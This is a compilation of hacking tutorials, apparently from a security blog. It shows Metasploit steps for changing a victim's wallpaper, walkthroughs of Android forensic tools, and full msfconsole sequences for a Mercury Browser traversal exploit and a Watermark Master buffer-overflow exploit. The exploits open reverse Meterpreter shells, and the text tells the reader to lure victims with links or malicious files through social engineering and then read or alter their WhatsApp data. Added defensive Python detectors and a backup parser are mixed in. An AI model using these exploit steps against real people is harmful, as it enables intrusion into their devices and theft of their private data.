How to Hack Windows Wallpaper of Remote PC


Today we will learn how to change the wallpaper on a remote system.

Table of Content:
· Introduction of set_wallpaper module
· Change Wallpaper on Windows
· Change Wallpaper on Android

Requirements
Attacker: Kali Linux
Targets: Windows, Android

Introduction of set_wallpaper module
The Metasploit Framework is written primarily in Ruby, and this post-exploitation module is written in Ruby as well. Looking at it more closely, it uses a different mechanism on each platform to do its job. The module itself is simple: all it does is set the desktop wallpaper on the specified session.

When the module runs, it first locates the wallpaper file on the attacker machine. It then uploads that file to the victim system on which we have a Meterpreter session; the upload location varies from platform to platform. Finally the script uses the method appropriate for that platform to change the wallpaper. The module was written by timwr and has a reliability rank of Normal. Now that we know how the module works, let's change the wallpaper.

Change Wallpaper on Windows
Open a Kali Linux terminal and type msfconsole to load the Metasploit Framework. We first need to compromise the victim's machine to obtain a session of any type, either Meterpreter or shell; to do so you can read our previous article from here.

Once we have Meterpreter on the remote system, it is time to use the post-exploitation module. This cannot be done from the Meterpreter shell, so we use the background command in the Meterpreter session (or the Ctrl+Z shortcut) to send the session to the background. Now follow the steps shown in the image to use the set_wallpaper post-exploitation module.

use post/multi/manage/set_wallpaper
set session 1
set wallpaper_file /root/Desktop/1.jpeg
exploit

This will change the wallpaper on the target system.
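From the defender's side, a wallpaper change made by anything other than the Windows shell is a cheap signal that a session like the one above has been used. On Windows the wallpaper path is stored in the Wallpaper value under HKCU\Control Panel\Desktop, and Sysmon can record writes to it as Event ID 13 (RegistryEvent, Value Set) when configured to watch that key. The script below is an added example, not code from the original post or from the Metasploit module: it takes simplified, constructed Sysmon records (the SIDs, paths and timestamps are made up) and flags wallpaper writes from processes outside an assumed allow-list, raising severity when the new image sits in a temp or public directory.

```python
"""Flag desktop-wallpaper changes made by unexpected processes.

Added defensive example; the events below are constructed, simplified Sysmon
Event ID 13 (RegistryEvent, Value Set) records, not real telemetry.
Assumption: Sysmon is configured to record value sets under
HKCU\\Control Panel\\Desktop, which is where Windows stores the wallpaper path.
"""
from typing import List, Optional

# Processes expected to write the wallpaper value on a normal workstation.
# Assumption: tune this allow-list to your own environment.
ALLOWED_IMAGES = {
    r"c:\windows\explorer.exe",
    r"c:\windows\immersivecontrolpanel\systemsettings.exe",
}

# Sysmon reports HKCU keys as HKU\<SID>\..., so match on the key suffix only.
WALLPAPER_SUFFIX = "\\control panel\\desktop\\wallpaper"

# Directories where dropped files commonly land; a wallpaper path under one of
# them raises the severity (a heuristic, not proof of compromise).
SUSPECT_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")

# Constructed sample events (Sysmon-style field names, made-up contents).
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2024-01-15 09:12:01.100",
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Control Panel\Desktop\Wallpaper",
     "Details": r"C:\Users\alice\Pictures\beach.jpg"},
    {"EventID": 13, "UtcTime": "2024-01-15 09:12:01.120",
     "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Control Panel\Desktop\WallpaperStyle",
     "Details": "DWORD (0x0000000a)"},
    {"EventID": 1, "UtcTime": "2024-01-15 09:14:30.000",
     "Image": r"C:\Users\alice\AppData\Local\Temp\svc_update.exe",
     "CommandLine": "svc_update.exe"},
    {"EventID": 13, "UtcTime": "2024-01-15 09:14:31.500",
     "Image": r"C:\Users\alice\AppData\Local\Temp\svc_update.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Control Panel\Desktop\Wallpaper",
     "Details": r"C:\Users\alice\AppData\Local\Temp\1.jpeg"},
]


def classify(event: dict) -> Optional[dict]:
    """Return an alert record for a suspicious wallpaper change, else None."""
    if event.get("EventID") != 13:
        return None
    if not event.get("TargetObject", "").lower().endswith(WALLPAPER_SUFFIX):
        return None  # some other value under the Desktop key, e.g. WallpaperStyle
    image = event.get("Image", "")
    if image.lower() in ALLOWED_IMAGES:
        return None
    new_wallpaper = event.get("Details", "")
    severity = "medium"
    if any(d in new_wallpaper.lower() for d in SUSPECT_DIRS):
        severity = "high"
    return {"time": event.get("UtcTime"), "image": image,
            "wallpaper": new_wallpaper, "severity": severity}


def scan(events: List[dict]) -> List[dict]:
    """Run classify() over a batch of events and keep the alerts."""
    return [alert for alert in map(classify, events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['time']} {alert['image']} "
              f"set wallpaper to {alert['wallpaper']}")
```

Matching on the key suffix rather than the full path is deliberate: Sysmon logs per-user hives as HKU\<SID>, so a fixed HKCU string would never match. The allow-list is the part to adapt; a wallpaper management tool or logon script in a corporate environment would need adding, otherwise it will generate medium-severity noise.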


Change Wallpaper on Android
First, get a Meterpreter session on the Android system; learn this here.
Once we have Meterpreter on the remote system, it is time to use the post-exploitation module. As on Windows, this cannot be done from the Meterpreter shell, so use the background command (or the Ctrl+Z shortcut) to send the session to the background, then follow the steps shown in the image to use the set_wallpaper post-exploitation module.
use post/multi/manage/set_wallpaper
set session 1
set wallpaper_file /root/Desktop/1.jpeg
exploit

This will change the wallpaper on the target system.


How to Create a Forensic Image of an Android Phone using Magnet Acquire

Magnet ACQUIRE is designed to quickly and easily acquire an image of any iOS or Android device. Examiners are given the choice of two extraction methods: Quick and Full.


First download Magnet Acquire from here and install it on your computer. Now connect your Android phone to the computer with a data cable. A pop-up will appear on your computer screen asking you to choose your device. Select the device and click Next.


Quick Extraction:
The Quick Extraction method works on any iOS device running version 5 or newer. Magnet ACQUIRE combines an iTunes backup with some additional acquisition techniques to obtain both native and third-party data.
Full Extraction:
Magnet ACQUIRE can also help you obtain a full physical image of many Android devices, either by using its built-in privilege escalation exploits or by imaging a device that has already been rooted.

Now select your desired option and click Next.


Now you will get a pop-up: first choose the destination folder, then enter the examiner name and other details, and click ACQUIRE.


On your Android phone you will get a screen that says Full backup; at the bottom right of the phone screen tap Back up my data.


The process will start as shown below.


When the process completes you will see the screen shown in the image below. Click Exit.


Magnet Acquire has now created a raw image of the Android phone in the folder you selected.

Forensics Investigation of Android Phone using Andriller

Andriller is a software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices. It has other features, such as lock screen cracking for pattern, PIN code or password, and custom decoders for app data from Android (and some Apple iOS) databases for decoding communications. Extraction and decoders produce reports in HTML and Excel (.xlsx) formats.

Features
· Automated data extraction and decoding
· Data extraction from non-rooted devices by Android Backup (Android versions 4.x)
· Data extraction with root permissions: root ADB daemon, CWM recovery mode, or SU binary (Superuser/SuperSU)
· Data parsing and decoding for folder structures, tarball files (from nanddroid backups), and Android Backup ('backup.ab') files
· Selection of individual database decoders for Android and Apple
· Decryption of encrypted WhatsApp archived databases (msgstore.db.crypt, msgstore.db.crypt5, msgstore.db.crypt7, msgstore.db.crypt8)
· Lock screen cracking for pattern, PIN, password
· Unpacking the Android backup files
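Both the Magnet Acquire flow above and the Andriller "AB method" go through Android's own backup prompt (the Full backup / Back up my data screen), which produces a backup.ab file. Knowing that format lets an examiner inspect or unpack such a file independently of either tool. The script below is an added example, not code from the original post or from Andriller or Magnet: it parses the four-line text header every .ab file starts with, inflates the zlib-compressed tar payload of an unencrypted backup, and lists the entries. The sample backup is constructed in build_sample_backup() with the apps/<package>/... and shared/<n>/... layout adb backup writes; the package name and file contents are made up.

```python
"""Parse and unpack an unencrypted Android backup (.ab) file.

Added example, not part of the original post and not Andriller's or Magnet's
own code. The sample backup is constructed in build_sample_backup(); real
files come from the adb backup flow behind the "Back up my data" prompt.
"""
import io
import tarfile
import zlib
from dataclasses import dataclass
from typing import List

MAGIC = b"ANDROID BACKUP"


@dataclass
class AbHeader:
    version: int
    compressed: bool
    encryption: str      # "none" or "AES-256"
    payload_offset: int  # byte offset of the (zlib) tar stream for unencrypted files


def parse_header(data: bytes) -> AbHeader:
    """Read the four newline-terminated text lines that start every .ab file."""
    lines = data.split(b"\n", 4)
    if len(lines) < 5 or lines[0] != MAGIC:
        raise ValueError("not an Android backup file")
    version = int(lines[1])
    compressed = lines[2] == b"1"
    encryption = lines[3].decode("ascii")
    offset = sum(len(line) + 1 for line in lines[:4])  # four lines plus newlines
    return AbHeader(version, compressed, encryption, offset)


def is_encrypted(data: bytes) -> bool:
    """True when the backup was taken with a backup password."""
    return parse_header(data).encryption != "none"


def to_tar_bytes(data: bytes) -> bytes:
    """Strip the header and inflate the payload into a plain tar archive."""
    header = parse_header(data)
    if header.encryption != "none":
        # Encrypted backups carry extra header lines (salts, rounds, IV, wrapped
        # master key) and need the user's password; not handled here.
        raise ValueError(f"encrypted backup ({header.encryption}) not supported")
    payload = data[header.payload_offset:]
    return zlib.decompress(payload) if header.compressed else payload


def list_entries(data: bytes) -> List[str]:
    """Names of the files inside the backup (apps/<pkg>/..., shared/<n>/...)."""
    with tarfile.open(fileobj=io.BytesIO(to_tar_bytes(data)), mode="r:") as tf:
        return [member.name for member in tf.getmembers()]


def build_sample_backup(compressed: bool = True) -> bytes:
    """Constructed sample with the directory layout adb backup produces."""
    files = [
        ("apps/com.example.notes/_manifest", b"com.example.notes\n1\n"),
        ("apps/com.example.notes/db/notes.db", b"SQLite format 3\x00" + b"\x00" * 16),
        ("shared/0/Download/report.pdf", b"%PDF-1.4 constructed sample\n"),
    ]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tf:
        for name, content in files:
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    tar_bytes = buf.getvalue()
    body = zlib.compress(tar_bytes) if compressed else tar_bytes
    # Header: magic, format version, compressed flag, encryption algorithm.
    header = b"ANDROID BACKUP\n5\n%d\nnone\n" % (1 if compressed else 0)
    return header + body


if __name__ == "__main__":
    sample = build_sample_backup()
    print(parse_header(sample))
    for name in list_entries(sample):
        print(name)
```

For an unencrypted, compressed file the payload offset works out to 24 bytes, which is why the common manual recipe skips the first 24 bytes and inflates the rest. Checking is_encrypted() first matters in practice: a backup taken with a device backup password cannot be unpacked without that password, and the tar data that follows the header is not a zlib stream in that case.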


First download Andriller from here and install it on your computer.

Now open Andriller and select the output folder: a pop-up appears, in which you select your desired folder.

Now connect your Android phone to the computer with a data cable. In Andriller click the Check option; if the phone is connected successfully, Andriller shows its serial ID.


Once you have the serial ID, tick the check boxes that say Open Report and Use AB method, and click GO.


You will get a pop-up; click OK.


On your Android phone you will get a screen that says Full backup; at the bottom right of the phone screen tap Back up my data.


Andriller will now start taking the backup of your phone, and you can watch the logs in Andriller as well.


Once the backup is complete, you can see the complete data in the folder you selected.


A page will open in your browser showing the complete phone report.


You can select any of the options to see the details, as shown in the image below. For example, select WiFi Passwords and you will get all the details saved under this folder.


Likewise, select the option that says Android Download History to see all downloads.


Likewise, select Android Call Logs to see all call details.


Likewise, select SMS Snippets to see an overview of all SMS messages.

Hack Android Phone WhatsApp and all Directories using Mercury Browser Vulnerability

This module exploits an unsafe intent URI scheme and a directory traversal found in Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a private WiFi manager activity, which starts Mercury's web server on port 8888. That web server also suffers from a directory traversal that allows remote access to sensitive files. By default, this module goes after webviewCookiesChromium.db, webviewCookiesChromiumPrivate.db, webview.db and bookmarks.db; if this isn't enough, you can also specify the ADDITIONAL_FILES datastore option to collect more files.
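The traversal half of this bug is the generic file-server mistake of mapping a request path onto a directory without checking that the result stays inside it. The script below is an added, defender-side example, not code from the original post or from the Metasploit module: safe_resolve() is the check a file server should apply (decode percent-encoding, resolve every ".." and reject anything outside the document root), and find_traversal() reuses it to pick traversal attempts out of access-log lines. The document root /sdcard, the log format and the log lines are all constructed for the demonstration; the page does not say which directory Mercury's server exposed or how it logged.

```python
"""Detect and block directory traversal in file-server request paths.

Added defensive example, not part of the original post. Assumptions: the
server exposes a single document root (DOC_ROOT below) and requests are
available in a common access-log format; the root, the log format and the
log lines are constructed for this demonstration.
"""
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

DOC_ROOT = "/sdcard"  # assumed root of the exposed directory (constructed)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed access-log lines: two normal requests and two traversal attempts.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jan/2024:09:20:01 +0000] "GET /Download/report.pdf HTTP/1.1" 200 5120
10.0.0.9 - - [15/Jan/2024:09:20:07 +0000] "GET /../../../../data/data/com.example.notes/db/notes.db HTTP/1.1" 200 8192
10.0.0.9 - - [15/Jan/2024:09:20:09 +0000] "GET /%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 200 180
10.0.0.5 - - [15/Jan/2024:09:20:11 +0000] "GET /DCIM/Camera/../Camera/IMG_0001.jpg HTTP/1.1" 200 7000
"""


def safe_resolve(root: str, requested: str) -> Optional[str]:
    """Map a request path onto the document root; return None if it escapes."""
    path = requested.split("?", 1)[0]
    for _ in range(3):  # undo percent-encoding, including double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if "\x00" in path:  # NUL bytes truncate paths in C-based servers
        return None
    path = path.replace("\\", "/")  # conservatively treat backslash as a separator
    segments = [s for s in path.split("/") if s not in ("", ".")]
    root = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root, *segments))
    # normpath has resolved every ".."; anything now outside root is a traversal
    if posixpath.commonpath([root, full]) != root:
        return None
    return full


def find_traversal(log_text: str, root: str = DOC_ROOT) -> List[dict]:
    """Return the log entries whose request path escapes the document root."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        if safe_resolve(root, match["path"]) is None:
            hits.append({"ip": match["ip"], "time": match["ts"], "path": match["path"]})
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} traversal attempt: {hit['path']}")
```

Note that the fourth sample line contains ".." yet is accepted, because it never leaves /sdcard; a naive rule that rejects any ".." substring would flag it, while a rule that only strips ".." text would miss the percent-encoded third line. Resolving the path first and comparing against the root handles both cases.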

Exploit Targets
Android Mercury Browser version 3.2.3

Requirement
Attacker: Kali Linux
Victim Phone: Android


Open a Kali terminal and type msfconsole.



Now type use auxiliary/server/android_mercury_parseuri
msf exploit (android_mercury_parseuri)>set payload android/meterpreter/reverse_tcp
msf exploit (android_mercury_parseuri)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (android_mercury_parseuri)>set srvhost 192.168.1.6
msf exploit (android_mercury_parseuri)>set uripath /
msf exploit (android_mercury_parseuri)>exploit

This is the URL you will give to the victim: http://192.168.1.6:8080


Go to the Google Play Store on your phone, search for Mercury Browser for Android and install it.


Send the link of the server to the victim via chat, email or any other social engineering technique.

Now when the victim opens the link (http://192.168.1.6:8080) it will show the page given below.


Now on your phone you will get a notification that says MERCURY WIFI ON...; you will have to turn it ON.


You will see a pop-up as shown below on your phone screen.



Now on your computer open a browser, type the phone's IP with port 8888 (192.168.1.4:8888) and press Enter. You now have access to all the directories, files and folders on the victim's phone.



For example, to access the victim's WhatsApp data, go to the WhatsApp folder; you will see options such as Download, Delete and Upload, from which you can make changes to the WhatsApp data or upload any files, as shown below.



Another example: to see what images are in the Camera folder, use the same method as above.

Hack Remote PC using Watermark Master Buffer Overflow (SEH)

This module exploits a stack-based buffer overflow in Watermark Master 2.2.23 when processing a specially crafted .WCF file. The vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Watermark Master to open a malicious .WCF file.

Exploit Targets
Watermark Master 2.2.23

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/windows/fileformat/watermark_master
msf exploit (watermark_master)>set payload windows/meterpreter/reverse_tcp
msf exploit (watermark_master)>set lhost 192.168.0.110 (IP of Local Host)
msf exploit (watermark_master)>exploit


After the malicious .wcf file has been generated successfully, it is stored on your local computer at:

/root/.msf4/local/msf.wcf


Now we need to set up a listener to handle the reverse connection the victim's machine sends when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.110
exploit

Now send the msf.wcf file to the victim using any social engineering technique. When the victim opens it in Watermark Master you will get a Meterpreter session on the victim PC.